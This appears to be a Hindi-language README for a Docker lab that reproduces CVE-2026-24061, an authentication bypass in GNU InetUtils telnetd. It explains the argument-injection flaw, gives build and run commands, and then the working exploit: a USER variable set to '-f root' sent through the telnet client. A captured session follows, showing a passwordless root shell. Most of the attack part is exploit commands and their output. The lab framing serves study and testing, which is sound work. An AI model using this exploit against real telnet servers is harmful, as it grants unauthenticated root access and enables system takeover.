
GNU InetUtils से GNU telnetd सेवा प्रमाणीकरण-बाईपास
जनवरी 2026 में, GNU InetUtils की GNU telnetd सेवा में Kyu Neushwaistein (उर्फ Carlos Cortes Alvarez) द्वारा प्रमाणीकरण-बायपास भेद्यता पाई गई। CVE-2026-24061 के रूप में ट्रैक की गई यह खामी एक हमलावर को वैध क्रेडेंशियल प्रदान किए बिना Telnet सत्र स्थापित करने की अनुमति देती है, जिससे लक्ष्य प्रणाली तक अनधिकृत पहुंच मिलती है। यह भेद्यता GNU telnetd सेवा के संस्करण 2.7-2 तक मौजूद है और ऐसा लगता है जैसे इसे सीधे 90 के दशक से लिया गया हो।
यह एक आर्गुमेंट इंजेक्शन भेद्यता (CWE-88) है जिसका CVSS v3.1 स्कोर 9.8 (क्रिटिकल) है।
संदर्भ:
निर्माण और चलाएं:
docker build -t telnetd-cve-2026-24061 .
docker run --rm -it -p 23:23 telnetd-cve-2026-24061
सेवा शुरू होने के बाद, telnetd पोर्ट 23 पर सुन रहा होगा।
यह भेद्यता USER पर्यावरण चर में -f फ्लैग इंजेक्ट करके प्रमाणीकरण को बायपास करने की अनुमति देती है। जब telnetd को -f से शुरू होने वाला उपयोगकर्ता नाम प्राप्त होता है, तो यह इसे लॉगिन प्रोग्राम को भेजता है जो -f को प्रमाणीकरण छोड़ने के फ्लैग के रूप में व्याख्या करता है।
इस भेद्यता का शोषण करने और root पहुंच प्राप्त करने के लिए निम्न कमांड का उपयोग करें:
# Linux क्लाइंट (-a विकल्प की आवश्यकता है)
USER="-f root" telnet -a 127.0.0.1 23
# macOS क्लाइंट (-a विकल्प की आवश्यकता नहीं)
USER="-f root" telnet 127.0.0.1 23
सफल शोषण के बाद, आपको पासवर्ड प्रदान किए बिना root शेल पहुंच प्राप्त होगी।
$ USER='-f root' telnet -a localhost 23
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Linux 6.14.0-37-generic (4dbc1b976c10) (pts/1)
Linux 4dbc1b976c10 6.14.0-37-generic #37~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Nov 20 10:25:38 UTC 2 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@4dbc1b976c10:~# id
uid=0(root) gid=0(root) groups=0(root)